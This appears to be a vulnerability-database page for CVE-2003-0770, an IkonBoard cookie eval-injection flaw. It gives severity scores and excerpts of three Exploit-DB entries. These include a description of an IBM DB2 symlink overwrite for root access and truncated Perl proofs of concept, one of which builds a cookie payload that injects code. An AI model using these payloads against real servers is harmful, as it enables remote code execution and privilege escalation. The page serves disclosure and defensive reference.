CVE-2003-0770
Published 2003-09-22
Priority: P3 45, high; CVSS 2.0 score 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 10.81% (95.3th percentile)
FUNC.pm in IkonBoard 3.1.2a and earlier, including 3.1.1, does not properly cleanse the "lang" cookie when it contains illegal characters, which allows remote attackers to execute arbitrary code when the cookie is inserted into a Perl "eval" statement.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ikonboard.com | ikonboard | — | — |
| ikonboard.com | ikonboard | — | — |
No detection rules found.
Exploit-DB
IBM DB2 db2job - File Overwrite
exploitdb·2003-08-05
CVE-2003-0898 IBM DB2 db2job - File Overwrite
---
source: https://www.securityfocus.com/bid/8344/info
IBM's DB2 database ships with a utility called db2job, installed with permissions 4550 and owned by root.db2asgrp.
It has been reported that db2job writes to a number of files with root privileges. The files written to are created with 0770 permissions (owner, group writeable) and are owned by root.db2asgrp. If a symbolic link is written to, the file pointed to will be overwritten and given these permissions. This can be exploited by local attackers with execute privileges to gain root access by writing malicious data to sensitive files (such as /etc/passwd, /etc/shadow) that have been overwritten.
It should be noted, however, that db2job is allegedly not world-executable by default. The two member
Exploit-DB
IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)
exploitdb·2003-05-05
CVE-2003-0770 IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)
---
source: https://www.securityfocus.com/bid/7361/info
It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.
An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard.
```perl
#!/usr/bin/perl
#
# Date: 5 May 2003
# Author: snooq [http://www.angelfire.com/linux/snooq/]
#
# Ikonboard 3.1.1 Remote Command Execution PoC
# ============================================
# This bug was found by Nick Cleaton.
#
# For more info and patch, go to:
# http://archives.neohapsis.com/archives/bugtraq/2003-04/0027.html
#
# Use at your very
```
Exploit-DB
IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)
exploitdb·2003-04-15
CVE-2003-0770 IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)
---
source: https://www.securityfocus.com/bid/7361/info
It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.
An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard.
```perl
#!/usr/bin/perl -w
use strict;
my $HOST = 'www.example.com';
my $PORT = 80;
my $PATH = '/cgi-bin/ikonboard.cgi';
my $HEAD = qq|"Content-type: text/plain\r\n\r\n"|;
use IO::Socket;
my $sock = IO::Socket::INET->new("$HOST:$PORT") or die "connect: $!";
my $val =
qq|.\0"if print($HEAD,map"\$_ => \$ENV{\$_}\n",keys\%ENV)&&exit;#|;
$val =~ s#(\W)# s
```
No writeups or analysis indexed.